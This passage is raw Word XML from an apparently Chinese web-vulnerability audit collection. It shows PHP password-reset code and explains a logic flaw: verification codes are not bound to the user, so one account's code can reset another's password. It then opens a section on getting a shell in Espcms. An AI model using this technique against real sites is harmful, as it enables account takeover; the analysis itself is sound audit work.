                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:line="236" w:lineRule="exact"/>
                    <w:ind w:left="180" w:right="50"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>".</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>date(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'Y-m-d</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-78"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-3"/>
                    </w:rPr>
                    <w:t>H:i:s')."</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-3"/>
                    </w:rPr>
                    <w:t>通过密码找回功能，重置了本站密码。</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-3"/>
                    </w:rPr>
                    <w:t>");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180" w:right="886" w:firstLine="4579"/>
                  </w:pPr>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>include</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> template('member', 'forget_password_username');</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:ind w:right="1383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exit</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95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right="1935"/>
                    <w:jc w:val="right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62" w:line="283" w:lineRule="auto"/>
                    <w:ind w:left="180" w:right="204" w:firstLine="4579"/>
                  </w:pPr>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>showmessage(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验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证码错误！请重新获取！</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>"</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>,HTTP_REFERER,3000);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="73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957" w:right="882"/>
                    <w:jc w:val="center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65"/>
                    <w:ind w:left="3843" w:right="50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</w:rPr>
                    <w:t>showmessage(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非法请求！</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="112"/>
                    <w:ind w:left="180" w:right="50"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>");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076" w:right="2832"/>
                    <w:jc w:val="center"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>} else 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  <w:lang w:eastAsia="zh-C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8382" type="#_x0000_t202" style="width:337.5pt;height:279.0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668" w:firstLine="2748"/>
                  </w:pPr>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>include</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> template('member', 'forget_password_username');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65"/>
                    <w:ind w:left="1095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邮箱获取验证码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2012" w:right="453" w:hanging="917"/>
                  </w:pPr>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>public</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> function public_get_email_verify() { pc_base::load_sys_func('mail');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$this-&gt;_session_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>start(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1585" w:firstLine="1831"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$code = 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'emc'</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>] = random(8,"23456789abcdefghkmnrstwxy");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SESSION[</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'emc_times']=5;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="65" w:line="283" w:lineRule="auto"/>
                    <w:ind w:left="2012" w:right="177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$message = '</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>您的验证码为：</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>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code; sendmail($_SESSION['email'],</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-75"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>邮箱找回密</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="9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码验证</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>', $message);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="112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'1';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before="30" w:line="326" w:lineRule="auto"/>
        <w:ind w:right="713"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>通过用户名找回密码方式存在设计缺陷。找回密码流程可分作三步来</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:w w:val="95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看</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:sz w:val="30"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="309" w:lineRule="auto"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsi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步骤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1: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>客户端提交用户名，服务端在数据库中查询记录，如果存在此</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-3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用户就在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-8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session </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>中保存用户身份信息；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="29"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="1" w:line="312" w:lineRule="auto"/>
        <w:ind w:left="417" w:right="414"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsi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步骤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2: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>生成验证码并保存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-82"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>session</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，然后将验证码发往用户注册邮</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-4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箱；</w:t>
      </w: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80020F">
      <w:pPr>
        <w:spacing w:before="149" w:line="309" w:lineRule="auto"/>
        <w:ind w:left="417" w:right="303"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsi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步骤</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-64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3: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>服务端将客户端提交的验证码与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-64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session </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>中保存的进行比对，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验证通过后重置用户密码。</w:t>
      </w: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80020F">
      <w:pPr>
        <w:spacing w:before="153" w:line="326" w:lineRule="auto"/>
        <w:ind w:left="417" w:right="713"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>从代码中可以看到验证码没有绑定用户身份，这样就导致可以使用</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>用</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>户</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-56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A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:spacing w:val="-23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的验证码来重置用户</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-56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B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:spacing w:val="-24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的密码。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:spacing w:line="326" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:sectPr w:rsidR="00292EF3">
          <w:footerReference w:type="default" r:id="rId67"/>
          <w:pgSz w:w="9980" w:h="14190"/>
          <w:pgMar w:top="1340" w:right="1380" w:bottom="1160" w:left="1380" w:header="0" w:footer="978" w:gutter="0"/>
          <w:pgNumType w:start="130"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="10"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="35" w:line="312" w:lineRule="auto"/>
        <w:ind w:left="417" w:right="487"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="68" w:name="密码相当"/>
      <w:bookmarkStart w:id="69" w:name="Espcms加密函数缺陷导致getshell"/>
      <w:bookmarkStart w:id="70" w:name="_bookmark32"/>
      <w:bookmarkEnd w:id="68"/>
      <w:bookmarkEnd w:id="69"/>
      <w:bookmarkEnd w:id="70"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>使用用户</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-62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A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（可控账户）走正常密码找回流程来获取验证码，但不使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用，然后再使用用户</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-5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B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（要攻击的账户）走步骤</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-5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1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，接着跳过步骤</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-5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2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>使用前面获取到的验证码直接走步骤</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-59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3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，就能重置用户</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-59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B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:spacing w:val="-27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的密码了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="179"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="44"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="44"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>密码相当</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:b/>
          <w:sz w:val="43"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">Espcms </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>加密函数缺陷</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>导</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>致</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:b/>
          <w:spacing w:val="-92"/>
          <w:sz w:val="32"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>getshell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="11"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman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作者：膜拜</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-66"/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>hym</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="30"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">* </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>程序的加解密函数存在缺陷，可以通</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>明文和密文逆向</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>还</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>原密</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>钥</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="51"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">* </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>后台登</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>陆处</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>没有有效</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
